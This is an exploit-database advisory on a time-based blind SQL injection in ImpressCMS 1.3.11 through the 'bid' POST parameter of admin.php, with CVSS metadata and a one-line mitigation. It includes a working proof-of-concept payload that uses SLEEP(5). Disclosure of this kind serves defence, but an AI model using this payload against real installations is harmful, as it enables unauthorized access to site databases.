ImpressCMS 1.3.11 - 'bid' SQL Injection

vendor:

ImpressCMS

by:

Mehmet Onder Key

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ImpressCMS

Affected Version From: 1.3.11

Affected Version To: 1.3.11

Patch Exists: N/A

Related CWE: N/A

CPE: a:impresscms:impresscms:1.3.11

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WAMPP @Win

2019

ImpressCMS 1.3.11 – ‘bid’ SQL Injection

An attacker can access all data following an un/authorized user login using the parameter 'bid' in the POST request URL http://localhost/impress/modules/system/admin.php?bid=12. The type of attack is a time-based blind SQL injection.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Title: ImpressCMS 1.3.11 - 'bid' SQL Injection
# Date: 21.01.2019
# Exploit Author: Mehmet Onder Key
# Vendor Homepage: http://www.impresscms.org/
# Software Link:
https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip
# Version: v1.3.11
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
ImpressCMS is a community developed Content Management System. With this
tool maintaining the content of a website becomes as easy as writing a word
document. ImpressCMS is the ideal tool for a wide range of users: from
business to community users, from large enterprises to people who want a
simple, easy to use blogging tool.

# Vulnerabilities:
# An attacker can access all data following an un/authorized user login
using the parameter.


# POC - SQLi :

# Parameter: bid (POST)
# Request URL: http://localhost/impress/modules/system/admin.php?bid=12

#    Type : time-based blind
bid=12') AND SLEEP(5) AND ('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==